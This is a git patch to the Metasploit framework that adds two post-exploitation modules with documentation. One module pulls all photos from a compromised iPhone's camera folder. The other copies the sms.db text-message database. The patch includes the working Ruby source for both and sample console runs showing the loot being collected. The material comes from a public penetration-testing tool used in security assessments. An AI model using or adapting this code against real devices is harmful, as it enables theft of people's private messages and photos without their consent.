From ea1c4596d9eac6e9e0d6b6a6b4aa543c1e83e3ca Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Fri, 2 Nov 2018 13:46:58 -0500 Subject: [PATCH] Land #10901, Add modules for iOS images and texts --- .../post/apple_ios/gather/ios_image_gather.md | 35 +++++++++++++ .../post/apple_ios/gather/ios_text_gather.md | 31 +++++++++++ .../post/apple_ios/gather/ios_image_gather.rb | 51 +++++++++++++++++++ .../post/apple_ios/gather/ios_text_gather.rb | 41 +++++++++++++++ 4 files changed, 158 insertions(+) create mode 100644 documentation/modules/post/apple_ios/gather/ios_image_gather.md create mode 100644 documentation/modules/post/apple_ios/gather/ios_text_gather.md create mode 100644 modules/post/apple_ios/gather/ios_image_gather.rb create mode 100644 modules/post/apple_ios/gather/ios_text_gather.rb diff --git a/documentation/modules/post/apple_ios/gather/ios_image_gather.md b/documentation/modules/post/apple_ios/gather/ios_image_gather.md new file mode 100644 index 0000000000..1c200d81aa --- /dev/null +++ b/documentation/modules/post/apple_ios/gather/ios_image_gather.md @@ -0,0 +1,35 @@ +## Description + + This module downloads the discovered images on iPhones + +## Verification Steps + + 1. Start msfconsole + 2. Get a session + 3. Do: ```use post/apple_ios/gather/ios_image_gather``` + 4. Do: ```set SESSION ``` + 5. Do: ```run``` + 6. You should get images from the iPhone target. + +## Scenarios + +### Tested on iOS 10.3.3 on an iPhone 5 + + ``` + + msf5 > use post/apple_ios/gather/ios_image_gather + msf5 post(apple_ios/gather/ios_image_gather) > set session 1 + session => 1 + msf5 post(apple_ios/gather/ios_image_gather) > run + + [!] SESSION may not be compatible with this module. + [+] Image path found. Will begin searching for images... + [*] Directory for iOS images: /Users/space/.msf4/loot/KlaBVw + [*] Downloading image: IMG_0001.JPG + [*] Downloading image: IMG_0002.JPG + [*] Downloading image: IMG_0003.JPG + [*] Downloading image: shell.php.jpg + [*] Post module execution completed + + + ``` diff --git a/documentation/modules/post/apple_ios/gather/ios_text_gather.md b/documentation/modules/post/apple_ios/gather/ios_text_gather.md new file mode 100644 index 0000000000..02d361d3c9 --- /dev/null +++ b/documentation/modules/post/apple_ios/gather/ios_text_gather.md @@ -0,0 +1,31 @@ +## Description + + This module downloads the `sms.db` file from iPhones + +## Verification Steps + + 1. Start msfconsole + 2. Get a session + 3. Do: ```use post/apple_ios/gather/ios_text_gather``` + 4. Do: ```set SESSION ``` + 5. Do: ```run``` + 6. You should get the sms.db file on the iPhone target + +## Scenarios + +### Tested on iOS 10.3.3 on an iPhone 5 + + ``` + + msf5 > use post/apple_ios/gather/ios_text_gather + msf5 post(apple_ios/gather/ios_text_gather) > set session 1 + session => 1 + msf5 post(apple_ios/gather/ios_text_gather) > run + + [!] SESSION may not be compatible with this module. + [+] sms.db file found + [+] sms.db stored at /Users/space/.msf4/loot/20181101154200_default_192.168.43.49_sms.db.file_591456.txt + [*] Post module execution completed + + + ``` diff --git a/modules/post/apple_ios/gather/ios_image_gather.rb b/modules/post/apple_ios/gather/ios_image_gather.rb new file mode 100644 index 0000000000..7d2b79abeb --- /dev/null +++ b/modules/post/apple_ios/gather/ios_image_gather.rb @@ -0,0 +1,51 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => 'iOS Image Gatherer', + 'Description' => %q{ + This module collects images from iPhones. + Module was tested on iOS 10.3.3 on an iPhone 5. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Shelby Pace' ], # Metasploit Module + 'Platform' => [ 'apple_ios' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + def enum_img(f_path) + path = File.join(Msf::Config.loot_directory, Rex::Text.rand_text_alpha(6)) + local_path = File.expand_path(path) + + ios_imgs = dir(f_path) + print_status("Directory for iOS images: #{local_path}") + + opts = { "block_size" => 262144 } + ios_imgs.each do |img| + begin + print_status("Downloading image: #{img}") + client.fs.file.download_file("#{local_path}/#{img}", "#{f_path}/#{img}", opts) + rescue + print_error("#{img} could not be downloaded") + end + end + end + + def run + img_path = '/private/var/mobile/Media/DCIM/100APPLE' + unless directory?(img_path) + fail_with(Failure::NotFound, "Could not find the default image file path") + end + print_good('Image path found. Will begin searching for images...') + + enum_img(img_path) + end +end diff --git a/modules/post/apple_ios/gather/ios_text_gather.rb b/modules/post/apple_ios/gather/ios_text_gather.rb new file mode 100644 index 0000000000..b7b83d22b1 --- /dev/null +++ b/modules/post/apple_ios/gather/ios_text_gather.rb @@ -0,0 +1,41 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => 'iOS Text Gatherer', + 'Description' => %q{ + This module collects text messages from iPhones. + Tested on iOS 10.3.3 on an iPhone 5. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Shelby Pace' ], # Metasploit Module + 'Platform' => [ 'apple_ios' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + def download_text_db(file_path) + db_file_data = read_file(file_path) + loc = store_loot('sms.db.file', 'text/plain', session, db_file_data, 'sms.db') + print_good("sms.db stored at #{loc}") + rescue + fail_with(Failure::NoAccess, "Failed to read sms.db file") + end + + def run + sms_path = '/private/var/mobile/Library/SMS/sms.db' + unless file?(sms_path) + fail_with(Failure::NotFound, "Couldn't locate sms.db file") + end + + print_good('sms.db file found') + download_text_db(sms_path) + end +end